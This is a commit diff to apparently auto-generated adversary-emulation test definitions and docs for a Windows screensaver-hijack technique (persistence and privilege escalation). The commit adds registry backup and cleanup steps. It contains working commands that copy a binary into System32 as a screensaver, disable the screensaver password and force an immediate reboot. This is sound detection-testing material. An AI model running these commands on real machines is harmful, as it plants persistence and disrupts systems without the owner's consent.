Generated docs from job=generate-docs branch=master [ci skip]

2022-07-13 16:55:34 +00:00
parent 4c7988bbfc
commit 9c46e34eb0
2 changed files with 17 additions and 0 deletions
@@ -37469,12 +37469,17 @@ privilege-escalation:
          default: C:\Windows\System32\cmd.exe
      executor:
        command: |
+          reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
          copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
          shutdown /r /t 0
+        cleanup_command: |
+          reg import %userprofile%\backup.reg
+          del %userprofile%\backup.reg
+          del %SystemRoot%\System32\evilscreensaver.scr
        name: command_prompt
        elevation_required: true
  T1543.001:
@@ -59611,12 +59616,17 @@ persistence:
          default: C:\Windows\System32\cmd.exe
      executor:
        command: |
+          reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
          copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
          reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
          shutdown /r /t 0
+        cleanup_command: |
+          reg import %userprofile%\backup.reg
+          del %userprofile%\backup.reg
+          del %SystemRoot%\System32\evilscreensaver.scr
        name: command_prompt
        elevation_required: true
  T1543.001:
@@ -40,6 +40,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc


 ```cmd
+reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
@@ -48,6 +49,12 @@ reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ
 shutdown /r /t 0
 ```

+#### Cleanup Commands:
+```cmd
+reg import %userprofile%\backup.reg
+del %userprofile%\backup.reg
+del %SystemRoot%\System32\evilscreensaver.scr
+```